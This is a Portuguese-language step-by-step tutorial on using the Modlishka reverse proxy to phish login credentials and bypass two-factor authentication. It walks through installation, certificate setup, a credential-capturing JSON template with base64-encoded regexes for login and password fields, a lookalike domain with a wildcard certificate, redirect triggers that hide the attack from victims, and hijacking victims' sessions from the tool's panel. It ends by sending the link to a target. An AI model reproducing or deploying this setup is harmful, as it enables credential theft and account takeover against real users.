Neste artigo, proponho considerar um método para roubar credenciais de usuário usando a tecnologia de proxy reverso, que nos permitirá ignorar a autenticação de dois fatores.
Para fazer isso, usaremos e customizaremos uma ferramenta bastante famosa em certos círculos chamada Modlishka.
Modlishka é um proxy reverso HTTP poderoso e flexível. Ele implementa uma abordagem de processamento de fluxo de tráfego HTTP baseada em navegador completamente nova e interessante que permite que você faça proxy transparente de tráfego direcionado de vários domínios, TLS e não TLS, por meio de um único domínio sem a necessidade de instalar nenhum certificado adicional no cliente.
O que exatamente isso significa? Resumindo, ele tem muito potencial que pode ser usado em muitos casos de uso.
Do ponto de vista da segurança, Modlishka atualmente pode ser usado para:
Realização de testes éticos de penetração de phishing usando um componente de proxy reverso transparente e automático com suporte universal para autenticação de dois fatores.
Envenenamento automático de cache do navegador HTTP 301 e captura de URL permanente, sem TLS.
Diagnóstico e interceptação de tráfego HTTP de aplicações de navegador em função do ataque "Client Domain Hooking".
Envolver sites legados em TLS para ofuscar bots, rastreadores automatizados, etc.
Modlishka foi escrito como uma tentativa de superar as limitações padrão do proxy reverso e como um desafio pessoal para ver o que é possível com motivação suficiente e um pouco mais de tempo de pesquisa.
Os resultados alcançados foram muito interessantes e a ferramenta foi lançada inicialmente e depois atualizada para:
Destaque os pontos fracos do esquema de autenticação de dois fatores (2FA) usado atualmente para que soluções de segurança adequadas possam ser criadas e implementadas no setor.
Apoie outros projetos que possam se beneficiar de um proxy reverso universal e transparente.
Aumente a conscientização da comunidade sobre técnicas e estratégias modernas de phishing e apoie os testadores de penetração em seu trabalho diário.
Modlishka foi escrito principalmente para tarefas relacionadas à segurança. No entanto, pode ser útil em outros casos de uso não relacionados à segurança.
Proxy eficaz!
Características
Gerais:
Proxy reverso de apontar e clicar HTTP e HTTPS de um domínio arbitrário.
Controle total sobre o fluxo de tráfego TLS de origem cruzada dos navegadores de seus usuários (sem a necessidade de instalar nenhum certificado adicional no cliente).
Configuração fácil e rápida com opções de linha de comando e arquivos de configuração JSON.
Injeção de carga útil de JavaScript baseada em modelo.
Envolvendo sites com "segurança" adicional: envolvimento TLS, autenticação, cabeçalhos de segurança apropriados, etc.
Remoção de sites de todos os cabeçalhos de criptografia e segurança (de volta ao estilo MITM dos anos 90).
Projeto sem estado. Pode ser facilmente dimensionado para lidar com uma quantidade arbitrária de tráfego - por exemplo, por meio de um balanceador de carga DNS.
Pode ser facilmente estendido às suas ideias com plugins modulares.
Plug-in de teste automático de certificado TLS para domínio proxy (requer certificado CA autoassinado)
Escrito em Go, funciona em quase todas as plataformas e arquiteturas: Windows, OSX, Linux, BSD é suportado.
Relacionado à segurança:
Suporte para a maioria dos esquemas de autenticação 2FA (pronto para uso).
Implementação prática do ataque "Client Domain Hooking". Compatível com o plug-in de diagnóstico.
Coleta de credenciais do usuário (com contexto baseado em IDs passados no parâmetro URL).
Um plug-in de painel da web com um resumo das credenciais coletadas automaticamente e um módulo de representação de sessão de usuário com um clique (prova de conceito / beta).
Nenhum modelo de site (apenas aponte o Modlishka para o domínio de destino - na maioria dos casos, ele será processado automaticamente sem configuração manual adicional).
Instalação e uso
A versão mais recente do código-fonte pode ser baixada https://github.com/drk1wi/modlishka/zipball/master
Obtenha o código com go get:
go get -u github.com/drk1wi/Modlishka
Vamos fazer um teste:
Modlishka
A saída é mais informativa do que prática, mas indica que não houve erros de instalação.
Verificamos o funcionamento do servidor proxy reverso diretamente, executamos o seguinte comando:
Modlishka -config /usr/local/Projects/pkg/mod/github.com/drk1wi/\!modlishka@v0.0.0-20200628043644-00a2385a0952/templates/google.com_gsuite.json
Como argumento, especifique a configuração padrão google.com
Ao ir para o endereço local do servidor onde o Modlishka está sendo executado, devemos obter um redirecionamento para a página inicial do Google.
Isto é conseguido da seguinte maneira.
A página que estamos solicitando contém:
<a href="http://google.com">Found</a>
Seguindo em frente, criamos um certificado SSL
openssl genrsa -out MyRootCA.key 2048
openssl req -x509 -new -nodes -key MyRootCA.key -sha256 -days 1024 -out MyRootCA.pem
Como resultado, temos dois arquivos.
Copie o conteúdo desses arquivos para autocert.go.
Nós coletamos novamente.
make
Então você precisa importar o certificado para o navegador do usuário (estamos fazendo isso em um ambiente de teste), abaixo analisaremos a configuração com um servidor dedicado e phishing "puro".
Imaginamos que tudo ocorreu perfeitamente e você pode enviar um link de phishing para o usuário.
Antes de começarmos, precisamos dar uma olhada nos modelos no diretório Modlishka. Temos apenas dois modelos disponíveis:
Google
Microsoft
Posso dizer desde já que os modelos padrão do Google e da Microsoft disponíveis para nós não funcionarão, então só precisamos aprender a fazer nossos próprios modelos.
A beleza do Modlishka é que não precisamos escrever nosso próprio clone do site, ou fazer algo como phislets com Evilginx.
O modelo é um arquivo json, basta copiá-lo e alterá-lo para atender às suas necessidades.
Cinco parâmetros-chave precisam ser alterados:
"alvo"
"cookie de rastreamento"
"registro"
"credParams"
"plugins"
"alvo" - site de destino.
"trackingCookie" - O nome do parâmetro que armazena o token de sessão:
"log" - O nome do arquivo onde os logs cairão.
"credParams" - Aqui é necessário colocar na forma codificada Base64 os nomes dos parâmetros + expressões regulares que irão caracterizar os caracteres de entrada.
Interceptamos o pedido de autorização no site.
Aqui estamos interessados em dois parâmetros:
Conecte-se
senha
Escrevemos expressões regulares como esta:
login=((?:\w+[\.\-\_]){0,}\w+)&
senha=((?:\w+[\.\-\_]){0,}\w+)&
E codifique tudo em Base64:
bG9naW49KCg/Olx3K1tcLlwtXF9dKXswLH1cdyspJg==,cGFzc3dvcmQ9KCg/Olx3K1tcLlwtXF9dKXswLH1cdyspJg=="
Jogue tudo em nosso novo modelo json.
"plugins" - Ative todos os plugins disponíveis - "all"
Inicie o Modlishka com o seguinte comando:
./proxy -config /usr/local/Projects/pkg/mod/github.com/drk1wi/\!modlishka@v0.0.0-20200628043644-00a2385a0952/templates/protey.json
Agora, quando você clicar no link:
Chegamos ao site de destino, onde inserimos as credenciais, que são transmitidas com sucesso ao invasor.
Além disso, no painel de controle Modlishka em:
http://loopback.modlishka.io/SayHello2Modlishka
Ganhamos o controle da sessão da vítima, este é o princípio de contornar o 2FA, controlamos totalmente a sessão obtendo dados sobre a sessão do usuário.
Parece bom, mas e se o invasor não puder adicionar o certificado ao navegador da vítima?
Vamos tentar descobrir.
Primeiro, vamos voltar a editar o arquivo de configuração. Vamos adicionar algum realismo ao que está acontecendo.
A vítima deve ser redirecionada para algum lugar após o login, que pode ser uma conta de fórum real, por exemplo. Para fins de demonstração, consideraremos esta opção.
"terminateRedirectUrl": "https://google.com"
Então precisamos de um servidor com um endereço IP "branco" onde o Modlishka estará localizado, você pode usar um roteador + portas de encaminhamento se o IP for "branco" estático.
Vamos supor que você já tenha tudo isso e esteja configurado. Compramos um domínio consonantal, tentamos imitar o site de destino o máximo possível.
No meu caso, este não é um sinalizador - phishing.protey.net
Em seguida, obteremos um certificado para ele, você pode comprá-lo, mas LetsEncrypt também funcionará para testes.
certbot certonly --manual --preferred-challenges dns --manual-public-ip-logging-ok -d '*.phishing.protey.net' -d phishing.protey.net
Seguindo as instruções, adicione um registro TXT e obtenha todo o conjunto de certificados.
Estamos interessados em dois arquivos:
fullchain.pem
privkey.pem
Copie-os para a pasta com Modlishka.
Vamos voltar ao arquivo de configuração, parâmetros:
"cert"
"certKey"
Eles recebem valores em uma linha, para isso você precisa alterar um pouco os arquivos de certificado:
sed -i ':a;N;$!ba;s/\n/\\n/g' privkey.pem
sed -i ':a;N;$!ba;s/\n/\\n/g' fullchain.pem
Em seguida, basta copiar seu conteúdo e substituí-lo nos parâmetros para que fique assim:
Mais algumas edições no arquivo de configuração:
"proxyDomain": "phishing.protey.net",
"trackingParam": "ident" - Para salvar os cookies da vítima.
"terminateTriggers": "/whats-new/", - Não há necessidade de manter a vítima constantemente através de um proxy, criamos uma trigger que, ao ir para a página "Novidades", encerrará a sessão e redirecionará o usuário para um site legítimo.
Garantimos que estamos prontos para phishing:
Servidor com Modlishka, roteador com IP estático branco, encaminhamento de porta, etc.
Comprou um domínio.
Certificados recebidos.
Não há erros no arquivo de configuração.
Iniciamos o Modlishka e compartilhamos o link com o usuário cujas credenciais gostaríamos de receber.
./proxy -config /usr/local/Projects/pkg/mod/github.com/drk1wi/\!modlishka@v0.0.0-20200628043644-00a2385a0952/templates/protey.json
O resultado será a interceptação das credenciais do usuário e o redirecionamento do usuário para o site real.
No console de gerenciamento Modlishka, obtemos todas as informações necessárias sobre a sessão do usuário.
Conclusão: Uma ferramenta muito simples, versátil e flexível, definitivamente útil.